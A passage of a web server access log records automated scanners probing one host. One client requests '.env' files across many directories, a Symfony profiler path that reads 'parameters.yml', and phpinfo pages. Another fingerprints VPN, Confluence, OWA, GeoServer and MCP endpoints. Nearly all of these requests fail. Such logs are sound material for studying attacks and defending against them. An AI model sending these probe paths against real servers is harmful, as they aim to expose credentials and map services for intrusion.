[Client 78.153.140.177] [Length 1033] [Gzip -] "Mozilla/5.0 (Linux; U; Android 2.3.5; en-nz; GT-S5570 Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" "-" +[18/Jan/2026:02:47:34 +0000] 404 - GET http 91.82.83.208 "/staging/.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; BRI/2; MAGW; InfoPath.2)" "-" +[18/Jan/2026:02:47:34 +0000] 404 - GET http 91.82.83.208 "/app_dev.php/_profiler/open?file=app/config/parameters.yml" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 7.0; LGMP260 Build/NRD90U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Mobile Safari/537.36" "-" +[18/Jan/2026:02:47:35 +0000] 404 - GET http 91.82.83.208 "/phpinfo.php" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_5; en-us) AppleWebKit/525.26.2 (KHTML, like Gecko) Version/3.2 Safari/525.26.12" "-" +[18/Jan/2026:02:47:35 +0000] 404 - GET http 91.82.83.208 "/info/" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36" "-" +[18/Jan/2026:02:47:35 +0000] 404 - GET http 91.82.83.208 "/app/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; rv:45.9) Gecko/20100101 Goanna/3.2 Firefox/45.9 PaleMoon/27.4.0" "-" +[18/Jan/2026:02:47:35 +0000] 404 - GET http 91.82.83.208 "/phpinfo/" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2700.0 Safari/537.36 OPR/38.0.2213.0 (Edition developer)" "-" +[18/Jan/2026:02:47:35 +0000] 404 - GET http 91.82.83.208 "/dev/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.12) Gecko/20080129 Firefox/2.0.0.8 (Debian-2.0.0.12-1)" "-" +[18/Jan/2026:02:47:36 +0000] 404 - GET http 91.82.83.208 "/.env.production" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.2.2; de-de; GT-P5110 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30" "-" +[18/Jan/2026:02:47:37 +0000] 404 - GET http 91.82.83.208 "/.env.save" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (iPhone; CPU iPhone OS 10_3 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E277 Safari/602.1" "-" +[18/Jan/2026:02:47:37 +0000] 404 - GET http 91.82.83.208 "/demo/.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.7 Safari/532.2" "-" +[18/Jan/2026:02:47:37 +0000] 404 - GET http 91.82.83.208 "/img/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.2.2; en-ca; GT-P3113 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30" "-" +[18/Jan/2026:02:47:37 +0000] 404 - GET http 91.82.83.208 "/vendor/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0) Gecko/20100101 Firefox/36.0" "-" +[18/Jan/2026:02:47:37 +0000] 404 - GET http 91.82.83.208 "/php-info.php" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.2.2; en-ca; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30" "-" +[18/Jan/2026:02:47:39 +0000] 404 - GET http 91.82.83.208 "/inf/" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CMDTDF; .NET4.0C; .NET4.0E)" "-" +[18/Jan/2026:02:47:39 +0000] 404 - GET http 91.82.83.208 "/upload/.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; MS-RTC LM 8; InfoPath.3)" "-" +[18/Jan/2026:02:47:39 +0000] 404 - GET http 91.82.83.208 "/includes/.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "-" +[18/Jan/2026:02:47:39 +0000] 404 - GET http 91.82.83.208 "/APPS/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) CriOS/55.0.2883.79 Mobile/14C92 Safari/602.1" "-" +[18/Jan/2026:02:47:39 +0000] 404 - GET http 91.82.83.208 "/application/.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36" "-" +[18/Jan/2026:02:47:40 +0000] 404 - GET http 91.82.83.208 "/.config" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 2.3.6; en-gb; GT-I9070 Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" "-" +[18/Jan/2026:02:47:40 +0000] 404 - GET http 91.82.83.208 "/doc/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_2_1 like Mac OS X; nb-no) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148a Safari/6533.18.5" "-" +[18/Jan/2026:02:47:40 +0000] 404 - GET http 91.82.83.208 "/css/.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; McAfee)" "-" +[18/Jan/2026:02:47:40 +0000] 404 - GET http 91.82.83.208 "/framework/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (iPhone; CPU iPhone OS 10_9_5 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12A365 Safari/600.1.4" "-" +[18/Jan/2026:02:48:44 +0000] 404 - GET http 91.82.83.208 "/backup/" [Client 204.76.203.18] [Length 150] [Gzip -] "-" "-" +[18/Jan/2026:02:54:24 +0000] 200 - GET http 91.82.83.208 "/" [Client 45.156.128.54] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" "-" +[18/Jan/2026:02:54:24 +0000] 404 - POST http 91.82.83.208 "/mcp" [Client 45.156.128.51] [Length 122] [Gzip 1.35] "python-httpx/0.28.1" "-" +[18/Jan/2026:02:54:24 +0000] 404 - GET http 91.82.83.208 "/sse" [Client 45.156.128.51] [Length 122] [Gzip 1.35] "python-httpx/0.28.1" "-" +[18/Jan/2026:02:54:24 +0000] 400 - GET http 91.82.83.208 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[18/Jan/2026:02:58:01 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:03:02:35 +0000] 200 - GET http 91.82.83.208 "/" [Client 172.236.228.198] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[18/Jan/2026:03:02:36 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 172.235.168.35] [Length 1033] [Gzip -] "-" "-" +[18/Jan/2026:03:02:45 +0000] 200 - GET http 91-82-83-208.pool.digikabel.hu "/" [Client 172.235.168.35] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:45 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/health" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:45 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/main.cfm" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:45 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/webui" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:45 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/nmaplowercheck1768705361" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:45 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:45 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/rest/applinks/1.0/manifest" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:45 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:45 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/main.cfm" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:45 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/nmaplowercheck1768705362" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:45 +0000] 404 - POST http 91-82-83-208.pool.digikabel.hu "/sdk" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:46 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/robots.txt" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:46 +0000] 200 - GET http 91-82-83-208.pool.digikabel.hu "/" [Client 172.235.168.35] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:46 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/dana-cached/hc/HostCheckerInstaller.osx" [Client 172.235.168.35] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:46 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[18/Jan/2026:03:02:46 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/api/v2/about" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:46 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/confluence/rest/applinks/1.0/manifest" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:46 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/+CSCOE+/logon.html" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:46 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/+CSCOE+/logon.html" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:46 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/human.aspx?arg12=infotech" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:46 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/webui" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:46 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/favicon.ico" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:46 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/start.cgi" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:46 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/owa/" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:46 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/evox/about" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:46 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/HNAP1" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:46 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/robots.txt" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:47 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/api/v2/about" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:47 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/readme.txt" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:47 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/owa/" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:47 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/user" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:47 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/start.cgi" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:47 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/dashboard/" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:47 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/geoserver/web/wicket/bookmarkable/org.geoserver.web.AboutGeoServerPage" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:47 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/geoserver/" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:47 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/login.php" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:47 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/dana-cached/hc/HostCheckerInstaller.osx" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:47 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/index.cfm" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:47 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/cgi-bin/info.cgi" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:47 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/geoserver/index.html" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:48 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/webui/index.html" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:48 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/Account/Login" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:48 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/xml/info.xml" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:48 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/readme.txt" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:48 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/start.cfm" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:49 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/geoserver/web/wicket/bookmarkable/org.geoserver.web.AboutGeoServerPage" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:49 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/api/v1/check-version" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:49 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/dana-na/nc/nc_gina_ver.txt" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:49 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/fog/management/index.php?node=client&sub=logininfo" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:49 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/webui" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:49 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/user" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:49 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/helpdesk/WebObjects/Helpdesk.woa" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:49 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/cgi-bin/info.cgi" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:49 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/health" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:49 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/cluster/list.query" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:49 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/admin.shtml" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:49 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/index.cfm" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:49 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/Account/Login" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:49 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/apps/zxtm/login.cgi" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:49 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/api/server/version" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:49 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/login.php" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:49 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/indice.jsa" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:49 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/fog/management/index.php?node=client&sub=logininfo" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:49 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/CFIDE/componentutils/" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:49 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/magento_version" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:49 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/rest/applinks/1.0/manifest" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:49 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/dashboard/" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:49 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/start.cfm" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:49 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/versa/login" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:49 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/admin.pl" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:49 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/confluence/rest/applinks/1.0/manifest" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:49 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/cluster/list.query" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:49 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/xml/info.xml" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:50 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/webui/index.html" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:50 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/index.cgi" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:50 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/admin.shtml" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:50 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/dniapi/userInfos" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:50 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/geoserver/index.html" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:50 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/api/server/version" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 